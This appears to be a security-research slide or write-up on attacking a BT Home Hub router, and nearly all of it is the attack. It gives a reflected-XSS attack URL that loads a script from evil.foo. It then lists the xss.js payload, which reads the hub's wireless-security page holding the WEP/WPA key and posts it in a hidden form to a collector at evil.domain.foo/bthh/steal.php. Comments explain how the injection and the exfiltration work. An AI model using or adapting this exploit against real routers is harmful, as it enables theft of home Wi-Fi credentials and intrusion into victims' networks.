PWNING BT HOME HUB: preauth leak + preauth XSS
Goal: steal the hub's WEP/WPA key. The injected script reads the hub's wireless-security configuration page from inside the victim's browser and posts it to an attacker-controlled server.
Attack URL: http://192.168.1.254/cgi/b/ic/connect/?url="><script%20src=http://evil.foo/xss.js></script><a%20b%3d — the `url` parameter is evidently reflected into an HTML attribute without encoding, so `">` closes the attribute and tag and injects the external script; the trailing `<a b=` opens an attribute that swallows whatever markup followed the injection point, keeping the page parseable. Because the script is loaded into the hub's own origin, everything it then requests from 192.168.1.254 is same-origin.
Payload (`xss.js`) — the external script referenced by the attack URL, served from the attacker's host:
// xss.js — runs inside the Home Hub's origin (192.168.1.254) once the reflected
// XSS in /cgi/b/ic/connect/ has loaded it, so the request below is same-origin
// and its response body is readable by script.
document.write("<body>");
var req;
// Wireless-security configuration page of the hub. The slide title labels this
// leak "preauth"; this is presumably the page that carries the WEP/WPA key.
var url = "/cgi/b/_wli_/seccfg/?ce=1&be=1&l0=4&l1=0";

// XMLHttpRequest wrapper, elided in the original listing. It presumably assigns
// the global `req`, registers processReqChange as the onreadystatechange
// handler and GETs `url` — not shown here, so treat that as an assumption.
function loadXMLDoc(url) {  [snip] }

// readystatechange handler: once the config page has arrived, exfiltrate its
// raw HTML to the attacker's collector.
function processReqChange() {
  if (req.readyState == 4) {          // 4 = request complete
    if (req.status == 200) {
      // A hidden form is used rather than a second XHR: submitting a form to a
      // foreign origin is an ordinary navigation that the same-origin policy
      // does not restrict, so no cross-origin XHR is needed to get the data out.
      var f = document.createElement("form");
      f.name = "myform";
      f.action = "http://evil.domain.foo/bthh/steal.php";
      // POST is handy for submitting large chunks of data
      f.method = "POST";
      var t = document.createElement('INPUT');
      t.type = 'hidden';
      t.name = 'data';
      // escape() is applied on top of the browser's own form encoding, so
      // steal.php must unescape the field to recover the page text.
      t.value = escape(req.responseText);
      f.appendChild(t);
      document.body.appendChild(f);
      // No target is set, so this navigates the visible page to the collector —
      // the exfiltration is not silent from the victim's point of view.
      f.submit();
    }
  }
}

loadXMLDoc(url);
document.write("</body>");